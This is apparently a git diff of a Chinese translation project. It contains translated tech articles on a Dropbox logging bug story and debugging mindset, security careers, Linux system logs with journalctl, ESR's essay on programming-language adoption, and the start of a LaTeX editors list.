第二个 bug 和第一个相似:如果日志目录的大小达到了上限,客户端会从最新的日志而不是最早的日志开始删除。同理,你总是会丢失一些日志文件,但你大概更不在乎那些较早的日志。
|
||||
|
||||
第三个 bug 和加密有关。有时服务器会无法对一个日志文件解码(我们一般不知道为什么——也许发生了位反转)。我们在后端没有正确地处理这个错误,而服务器会返回 500。客户端看到 500 之后会做合理的反应:它会认为服务器停机了。所以它会停止发送日志文件并且不再尝试发送其他的日志。
|
||||
|
||||
对于一个损坏的日志文件返回 500 显然不是正确的行为。你可以考虑返回 400,因为问题出在客户端的请求上。但客户端同样无法修复这个问题——如果日志文件现在无法解码,我们后也永远无法将它解码。客户端正确的做法是直接删除日志文件然后继续运行。实际上,这正是客户端在成功上传日志文件并从服务器收到 200 的响应时的默认行为。所以我们说,好——如果日志文件无法解码,就返回 200。
|
||||
|
||||
所有这些 bug 都很容易修复。前两个 bug 出在客户端上,所以我们在 alpha 版本修复了它们,但大部分的客户端还没有获得这些改动。我们在服务器代码中修复了第三个 bug 并部署了新版的服务器。
|
||||
|
||||
### 📈
|
||||
|
||||
突然日志服务器集群的流量开始激增。客服团队找到我们并问我们是否知道原因。我花了点时间把所有的部分拼到一起。
|
||||
|
||||
在修复之前,这四件事情会发生:
|
||||
|
||||
1. 日志文件从最早的开始发送
|
||||
|
||||
2. 日志文件从最新的开始删除
|
||||
|
||||
3. 如果服务器无法解码日志文件,它会返回 500
|
||||
|
||||
4. 如果客户端收到 500,它会停止发送日志
|
||||
|
||||
一个存有损坏的日志文件的客户端会试着发送这个文件,服务器会返回 500,客户端会放弃发送日志。在下一次运行时,它会尝试再次发送同样的文件,再次失败,并再次放弃。最终日志目录会被填满,然后客户端会开始删除最新的日志文件,而把损坏的文件继续保留在硬盘上。
|
||||
|
||||
这三个 bug 导致的结果是:如果客户端在任何时候生成了损坏的日志文件,我们就再也不会收到那个客户端的日志了。
|
||||
|
||||
问题是,处于这种状态的客户端比我们想象的要多很多。任何有一个损坏文件的客户端都会像被关在堤坝里一样,无法再发送日志。现在这个堤坝被清除了,所有这些客户端都开始发送它们的日志目录的剩余内容。
|
||||
|
||||
### 我们的选择
|
||||
|
||||
好的,现在文件从世界各地的电脑如洪水般涌来。我们能做什么?(当你在一个有 Dropbox 这种规模,尤其是这种桌面客户端的规模的公司工作时,会遇到这种有趣的事情:你可以非常轻易地对自己造成 DDOS 攻击)。
|
||||
|
||||
当你部署的新版本发生问题时,第一个选项是回滚。这是非常合理的选择,但对于这个问题,它无法帮助我们。我们改变的不是服务器的状态而是客户端的——我们删除了那些出错文件。将服务器回滚可以防止更多客户端进入这种状态,但它并不能解决根本问题。
|
||||
|
||||
那扩大日志集群的规模呢?我们试过了——然后因为处理能力增加了,我们开始收到更多的请求。我们又扩大了一次,但你不可能一直这么下去。为什么不能?因为这个集群并不是独立的。它会向另一个集群发送请求,在这里是为了处理异常。如果你的一个集群正在被 DDOS,而你持续扩大那个集群,你最终会把它依赖的集群也弄坏,然后你就有两个问题了。
|
||||
|
||||
我们考虑过的另一个选择是减低负载——你不需要每一个日志文件,所以我们可以直接无视一些请求。一个难点是我们并没有一个很好的方法来区分好的请求和坏的请求。我们无法快速地判断哪些日志文件是旧的,哪些是新的。
|
||||
|
||||
我们最终使用的是一个 Dropbox 里许多不同场合都用过的一个解决方法:我们有一个自定义的头字段,`chillout`,全世界所有的客户端都遵守它。如果客户端收到一个有这个头字段的响应,它将在字段所标注的时间内不再发送任何请求。很早以前一个英明的程序员把它加到了 Dropbox 客户端里,在之后这些年中它已经不止一次地起了作用。
|
||||
|
||||
### 了解你的系统
|
||||
|
||||
这个 bug 的第一个教训是要了解你的系统。我对于客户端和服务器之间的交互有不错的理解,但我并没有考虑到当服务器和所有这些客户端同时交互的时候会发生什么。这是一个我没有完全搞懂的层面。
|
||||
|
||||
### 了解你的工具
|
||||
|
||||
第二个教训是要了解你的工具。如果出了差错,你有哪些选项?你能撤销你做的迁移吗?你如何知道事情出了差错,你又如何发现更多信息?所有这些事情都应该在危机发生之前就了解好——但如果你没有,你会在危机发生时学到它们并不会再忘记。
|
||||
|
||||
### 功能开关 & 服务器端功能控制
|
||||
|
||||
第三个教训是专门针对移动端和桌面应用开发者的:_你需要服务器端功能控制和功能开关_。当你发现一个问题时如果你没有服务器端的功能控制,你可能需要几天或几星期来推送新版本或者提交新版本到应用商店中,然后问题才能得到解决。这是个很糟糕的处境。Dropbox 桌面客户端不需要经过应用商店的审查过程,但光是把一个版本推送给上千万的用户就已经要花很多时间。相比之下,如果你能在新功能遇到问题的时候在服务器上翻转一个开关:十分钟之后你的问题就已经解决了。
|
||||
|
||||
这个策略也有它的代价。加入很多的功能开关会大幅提高你的代码的复杂度。而你的测试代码更是会成指数地复杂化:要考虑 A 功能和 B 功能都开启,或者仅开启一个,或者都不开启的情况——然后每个功能都要相乘一遍。让工程师们在事后清理他们的功能开关是一件很难的事情(我自己也有这个毛病)。另外,桌面客户端会同时有好几个版本有人使用,也会加大思考难度。
|
||||
|
||||
但是它的好处——啊,当你需要它的时候,你真的是很需要它。
|
||||
|
||||
# 如何去爱 bug
|
||||
|
||||
我讲了几个我爱的 bug,也讲了为什么要爱 bug。现在我想告诉你如何去爱 bug。如果你现在还不爱 bug,我知道唯一一种改变的方法,那就是要有成长型心态。
|
||||
|
||||
社会学家 Carol Dweck 做了很多关于人们如何看待智力的研究。她找到两种不同的看待智力的心态。第一种,她叫做固定型心态,认为智力是一个固定的特征,人类无法改变自己智力的多寡。另一种心态叫做成长型心态。在成长型心态下,人们相信智力是可变的而且可以通过努力来增强。
|
||||
|
||||
Dweck 发现一个人看待智力的方式——固定型还是成长型心态——可以很大程度地影响他们选择任务的方式、面对挑战的反应、认知能力、甚至是他们的诚信度。
|
||||
|
||||
【我在新西兰 Kiwi Pycon 会议所做的主题演讲中也讨论过成长型心态,所以在此只摘录一部分内容。你可以在[这里][7]找到完整版的演讲稿】
|
||||
|
||||
关于诚信的发现:
|
||||
|
||||
> 在这之后,他们让学生们给笔友写信讲这个实验,信中说“我们在学校做了这个实验,这是我得的分数”。他们发现 _因智力而受到表扬的学生中几乎一半人谎报了自己的分数_ ,而因努力而受表扬的学生则几乎没有人不诚实。
|
||||
|
||||
关于努力:
|
||||
|
||||
> 数个研究发现有着固定型心态的人会不愿真正去努力,因为他们认为这意味着他们不擅长做他们正努力去做的这件事情。Dweck 写道,“如果每当一个任务需要努力的时候你就会怀疑自己的智力,那么你会很难对自己的能力保持自信。”
|
||||
|
||||
关于面对困惑:
|
||||
|
||||
> 他们发现有成长型心态的学生大约能理解 70% 的内容,不论里面是否有难懂的段落。在有固定型心态的学生中,那些被分配没有难懂段落的手册的学生同样可以理解大约 70%。但那些看到了难懂段落的持固定型心态的学生的记忆则降到了 30%。有着固定型心态的学生非常不擅长从困惑中恢复。
|
||||
|
||||
这些发现表明成长型心态对 debug 至关重要。我们必须从从困惑中重整旗鼓,诚实地面对我们理解上的不足,并时不时地在寻找答案的路上努力奋斗——成长型心态会让这些都变得更简单而且不那么痛苦。
|
||||
|
||||
### 热爱你的 bug
|
||||
|
||||
我在 Recurse Center 工作时会直白地欢迎挑战,我就是这样学会热爱我的 bug 的。有时参与者会坐到我身边说“唉,我觉得我遇到了个奇怪的 Python bug”,然后我会说“太棒了,我 _爱_ 奇怪的 Python bug!” 首先,这百分之百是真的,但更重要的是,我这样是在对参与者强调,找到让自己觉得困难的事情是一种成就,而他们做到了这一点,这是件好事。
|
||||
|
||||
像我之前说过的,在 Recurse Center 没有截止日期也没有作业,所以这种态度没有任何成本。我会说,“你现在可以花一整天去在 Flask 里找出这个奇怪的 bug 了,多令人兴奋啊!”在 Dropbox 和之后的 Pilot,我们有产品需要发布,有截止日期,还有用户,于是我并不总是对在奇怪的 bug 上花一整天而感到兴奋。所以我对有截止日期的现实也是感同身受。但是如果我有 bug 需要解决,我就必须得去解决它,而抱怨它的存在并不会帮助我之后更快地解决它。我觉得就算在截止日期临近的时候,你也依然可以保持这样的心态。
|
||||
|
||||
如果你热爱你的 bug,你可以在解决困难问题时获得更多乐趣。你可以担心得更少而更加专注,并且从中学到更多。最后,你可以和你的朋友和同事分享你的 bug,这将会同时帮助你自己和你的队友们。
|
||||
|
||||
### 鸣谢!
|
||||
|
||||
在此向给我的演讲提出反馈以及给我的演讲提供其他帮助的人士表示感谢:
|
||||
|
||||
* Sasha Laundy
|
||||
|
||||
* Amy Hanlon
|
||||
|
||||
* Julia Evans
|
||||
|
||||
* Julian Cooper
|
||||
|
||||
* Raphael Passini Diniz 以及其他的 Python Brasil 组织团队成员
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://akaptur.com/blog/2017/11/12/love-your-bugs/
|
||||
|
||||
作者:[Allison Kaptur ][a]
|
||||
译者:[yixunx](https://github.com/yixunx)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://akaptur.com/about/
|
||||
[1]:http://2017.pythonbrasil.org.br/#
|
||||
[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs
|
||||
[3]:http://www.pilot.com/
|
||||
[4]:http://www.dropbox.com/
|
||||
[5]:http://www.recurse.com/
|
||||
[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM
|
||||
[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/
|
@ -0,0 +1,58 @@
|
||||
安全工作热门:受到培训并获得注意
|
||||
============================================================
|
||||
|
||||
![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
|
||||
来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。[经许可使用][1]
|
||||
|
||||
对安全专业人员的需求是真实的。在 [Dice.com][4] 中,超过 75,000 个职位中有 15% 是安全职位。[Forbes][6] 中称:“根据网络安全数据工具 [CyberSeek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但兴趣水平还很低。
|
||||
|
||||
### 安全是要关注的领域
|
||||
|
||||
根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为利基。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。
|
||||
|
||||
事实上,如果你有兴趣领先于商业领导者,那么安全是要关注的领域 - 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司优势。
|
||||
|
||||
### 无所畏惧
|
||||
|
||||
分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的[ Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。
|
||||
|
||||
在安全方面从未有过更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 - 数据泄露、系统故障和欺诈。安全团队正在不断变化,快节奏的环境中工作。真正的挑战在于在保持甚至改进最终用户体验的同时,积极主动地进行安全性,发现和消除漏洞。
|
||||
|
||||
### 增长即将来临
|
||||
|
||||
在技术的任何方面,安全将继续与云一起成长。企业越来越多地转向云计算,这暴露出比组织过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。
|
||||
|
||||
条例也在不断完善 - 个人身份信息(PII)越来越广泛。许多公司都发现他们必须投资安全来保持合规,避免成为头条新闻。由于面临巨额罚款,声誉受损以及行政工作安全,公司开始越来越多地为安全工具和人员安排越来越多的预算。
|
||||
|
||||
### 培训和支持
|
||||
|
||||
即使你不选择一个特定的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是鼓励的,但我建议结合培训、指导和不断实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。
|
||||
|
||||
对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 - 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。
|
||||
|
||||
### 游戏最后
|
||||
|
||||
越来越多的公司正在投资安全性,并试图填补他们的技术团队的开放角色。如果你对管理感兴趣,那么安全是值得关注的地方。执行领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。
|
||||
|
||||
明治地实施和有战略思想的安全是受到关注的。安全对高管和消费者之类至关重要 - 我鼓励任何对安全感兴趣的人进行培训和贡献。
|
||||
|
||||
_现在[下载][2]完整的 2017 年开源工作报告_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
|
||||
|
||||
作者:[ BEN COLLEN][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/bencollen
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:http://bit.ly/2017OSSjobsreport
|
||||
[3]:https://www.linux.com/files/images/security-skillspng
|
||||
[4]:http://www.dice.com/
|
||||
[5]:http://cyberseek.org/index.html#about
|
||||
[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
|
||||
[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
|
@ -1,68 +0,0 @@
|
||||
### 系统日志: 了解你的Linux系统
|
||||
|
||||
![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg)
|
||||
By: [chabowski][1]
|
||||
|
||||
本文摘自教授Linux小白(或者非资深桌面用户)技巧的系列文章. 该系列文章旨在为由LinuxMagazine基于 [openSUSE Leap][3] 发布的第30期特别版 “[Getting Started with Linux][2]” 提供补充说明.
|
||||
|
||||
本文作者是 Romeo S. Romeo, 他是一名 PDX-based enterprise Linux 专家,转为创新企业提供富有伸缩性的解决方案.
|
||||
|
||||
Linux系统日志非常重要. 后台运行的程序(通常被称为守护进程或者服务进程)处理了你Linux系统中的大部分任务. 当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为他们做过什么的历史信息. 这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接. 所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么.
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg)
|
||||
|
||||
Photo by Markus Spiske on Unsplash
|
||||
|
||||
有很多不同的日志. 历史上, 他们一般以纯文本的格式存储到 `/var/log` 目录中. 现在依然有很多日志这样做, 你可以很方便的使用 `less` 来查看它们.
|
||||
在新装的 `openSUSE Leap 42.3` 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储. `systemd`这套系统负责启动守护进程并在系统启动时让计算机做好被使用的准备。
|
||||
由 `systemd` 记录的日志以二进制格式存储, 这使地它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看.
|
||||
好在, 这个工具已经预安装在你的系统上了: 它的名字叫 `journalctl`,而且默认情况下, 它会将每个守护进程的所有日志都记录到一个地方.
|
||||
|
||||
只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了. 它会用 `less` 分页器显示各种日志. 为了让你有个直观的感受, 下面是`journalctl` 中摘录的一条日志记录:
|
||||
|
||||
```
|
||||
Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM.
|
||||
```
|
||||
|
||||
这条独立的日志记录以此包含了记录的日期和时间, 计算机名, 记录日志的进程名, 记录日志的进程PID, 以及日志内容本身.
|
||||
|
||||
若系统中某个程序运行出问题了, 则可以查看日志文件并搜索(使用 “/” 加上要搜索的关键字)程序名称. 有可能导致该程序出问题的错误会记录到系统日志中.
|
||||
有时,错误信息会足够详细让你能够修复该问题. 其他时候, 你需要在Web上搜索解决方案. Google就很适合来搜索奇怪的Linux问题.
|
||||
![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png)
|
||||
不过搜索时请注意你只输入了日志的内容, 行首的那些信息(日期, 主机名, 进程ID) 是无意义的,会干扰搜索结果.
|
||||
|
||||
解决方法一般在搜索结果的前几个连接中就会有了. 当然,你不能只是无脑得运行从互联网上找到的那些命令: 请一定先搞清楚你要做的事情是什么,它的效果会是什么.
|
||||
据说, 从系统日志中查询日志要比直接搜索描述故障的关键字要有用的多. 因为程序出错有很多原因, 而且同样的故障表现也可能由多种问题引发的.
|
||||
|
||||
比如, 系统无法发声的原因有很多, 可能是播放器没有插好, 也可能是声音系统出故障了, 还可能是缺少合适的驱动程序.
|
||||
如果你只是泛泛的描述故障表现, 你会找到很多无关的解决方法,而你也会浪费大量的时间. 而指定搜索日志文件中的内容, 你只会查询出他人也有相同日志内容的结果.
|
||||
你可以对比一下图1和图2.
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png)
|
||||
|
||||
图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果. 这种搜索通常没什么用.
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png)
|
||||
|
||||
图 2 搜索特定的日志行会显示出精确的,有用的结果. 这种搜索通常很有用.
|
||||
|
||||
也有一些系统不用 `journalctl` 来记录日志. 在桌面系统中最常见的这类日志包括用于 `/var/log/zypper.log` 记录openSUSE包管理器的行为; `/var/log/boot.log` 记录系统启动时的消息,这类消息往往滚动的特别块,根本看不过来; `/var/log/ntp` 用来记录 Network Time Protocol 守护进程同步时间时发生的错误.
|
||||
另一个存放硬件故障信息的地方是 `Kernel Ring Buffer`(内核环状缓冲区), 你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看).
|
||||
`Kernel Ring Buffer` 存储在内存中, 因此会在重启电脑后丢失. 不过它包含了Linux内核中的重要事件, 比如新增了硬件, 加载了模块, 以及奇怪的网络错误.
|
||||
|
||||
希望你已经准备好深入了解你的Linux系统了! 祝你玩的开心!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/
|
||||
|
||||
作者:[chabowski]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[1]:https://www.suse.com/communities/blog/author/chabowski/
|
||||
[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux
|
||||
[3]:https://en.opensuse.org/Portal:42.3
|
||||
[4]:http://www.linux-magazine.com/
|
@ -1,59 +0,0 @@
|
||||
ESR:最合理的语言工程模式
|
||||
============================================================
|
||||
|
||||
当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义、社会学意义,达到了奥地利经济学家所称的“<ruby>人类行为学<rt>praxeology</rt></ruby>”,这是目的明确的人类行为所能达到的最大范围。
|
||||
|
||||
对我来说这并不只是抽象理论。当我在开源开发项目中编写论文时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
|
||||
|
||||
在这个背景下,我的计划之外的文章系列的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的、更实用的想法,它们主要是关于计算机语言设计的分析,例如为什么它们会成功,或为什么它们会失败。
|
||||
|
||||
在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
|
||||
|
||||
现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言、函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
|
||||
|
||||
所谓的“远”、“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
|
||||
|
||||
在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题,汇编语言是短期解决方案。说明这种分类适用于非通用语言,还有 roff 标记语言。随着计算机技术的发展,PHP 和 Javascript 逐渐参与到这场游戏中。至于长期的解决方案? Oberon、Ocaml、ML、XML-Docbook 都可以。 它们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
|
||||
|
||||
如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
|
||||
|
||||
这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: (1)以远近为轴,在自身和预计的未来之间选取一个最适点,然后(2)降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
|
||||
|
||||
在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
|
||||
|
||||
当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
|
||||
|
||||
相反的, C 语言低廉的内部转化成本未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal 、汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
|
||||
|
||||
C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身转化成本,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了类 C 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
|
||||
|
||||
另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python 就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
|
||||
|
||||
今天我们在 2017 年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
|
||||
|
||||
即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
|
||||
|
||||
我们现在已经知道了两件十分重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
|
||||
|
||||
这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
|
||||
|
||||
当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前 20 名,在 PYPL 指数上它的成就也比 Go 差很多。
|
||||
|
||||
五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
|
||||
|
||||
在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://esr.ibiblio.org/?p=7745
|
||||
|
||||
作者:[Eric Raymond][a]
|
||||
译者:[Valoniakim](https://github.com/Valoniakim)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://esr.ibiblio.org/?author=2
|
||||
[1]:http://esr.ibiblio.org/?author=2
|
||||
[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
|
||||
[3]:http://esr.ibiblio.org/?p=7745
|
184
translated/tech/20171119 10 Best LaTeX Editors For Linux.md
Normal file
184
translated/tech/20171119 10 Best LaTeX Editors For Linux.md
Normal file
@ -0,0 +1,184 @@
|
||||
针对 Linux 平台的 10 款最好 LaTeX 编辑器
|
||||
======
|
||||
**简介:一旦你克服了 LaTeX 的学习曲线,就没有什么比得上 LaTeX 了。下面介绍的是针对 Linux 和其他平台的最好的 LaTeX 编辑器。**
|
||||
|
||||
## LaTeX 是什么?
|
||||
|
||||
[LaTeX][1] 是一个文档制作系统。与纯文本编辑器不同,在 LaTeX 编辑器中你不能只写纯文本,为了组织文档的内容,你还必须使用一些 LaTeX 命令。
|
||||
|
||||
![LaTeX 示例][2]![LaTeX 示例][3]
|
||||
|
||||
LaTeX 编辑器一般用在出于学术目的的科学研究文档或书籍的出版,最重要的是,当你需要处理包含众多复杂数学符号的文档时,它能够为你带来方便。当然,使用 LaTeX 编辑器是很有趣的,但它也并非总是很有用,除非你对所要编写的文档有一些特别的需求。
|
||||
|
||||
## 为什么你应当使用 LaTeX?
|
||||
|
||||
好吧,正如我前面所提到的那样,使用 LaTeX 编辑器便意味着你有着特定的需求。为了捣腾 LaTeX 编辑器,并不需要你有一颗极客的头脑。但对于那些使用一般文本编辑器的用户来说,它并不是一个很有效率的解决方法。
|
||||
|
||||
假如你正在寻找一款工具来精心制作一篇文档,同时你对花费时间在格式化文本上没有任何兴趣,那么 LaTeX 编辑器或许正是你所寻找的那款工具。在 LaTeX 编辑器中,你只需要指定文档的类型,它便会相应地为你设置好文档的字体种类和大小尺寸。正是基于这个原因,难怪它会被认为是 [给作家的最好开源工具][4] 之一。
|
||||
|
||||
但请务必注意: LaTeX 编辑器并不是自动化的工具,你必须首先学会一些 LaTeX 命令来让它能够精确地处理文本的格式。
|
||||
|
||||
## 针对 Linux 平台的 10 款最好 LaTeX 编辑器
|
||||
|
||||
